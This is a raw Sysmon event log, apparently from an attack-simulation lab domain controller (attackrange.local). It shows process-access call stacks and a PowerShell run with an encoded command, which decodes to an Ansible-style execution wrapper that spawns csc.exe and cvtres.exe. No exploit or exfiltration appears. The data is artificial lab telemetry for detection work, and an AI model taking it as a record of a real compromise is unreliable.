:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003591Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003590Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003588Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8581-5FCF-B100-000000009101}816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003587Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8581-5FCF-B000-000000009101}44844112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-8581-5FCF-B100-000000009101}816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003586Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.693{10ACEC4A-8581-5FCF-B100-000000009101}816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES1B14.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCEF49F8F27F83461185BB62D7D85FBB63.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-8581-5FCF-B000-000000009101}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\nwrcnwgr.cmdline" 10341000x80000000000000003585Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8581-5FCF-B000-000000009101}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003584Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003583Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003582Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003581Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003580Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003579Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003578Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003577Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003575Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8581-5FCF-B000-000000009101}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003574Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.598{10ACEC4A-8581-5FCF-AE00-000000009101}47964116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8581-5FCF-B000-000000009101}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81927B7BF) 154100x80000000000000003573Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.599{10ACEC4A-8581-5FCF-B000-000000009101}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\nwrcnwgr.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003572Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.582{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\nwrcnwgr.cmdline2020-12-08 13:54:09.582 11241100x80000000000000003571Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:09.582{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\nwrcnwgr.dll2020-12-08 13:54:09.582 10341000x80000000000000003570Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8581-5FCF-AF00-000000009101}5116C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003569Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003568Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003567Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003566Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 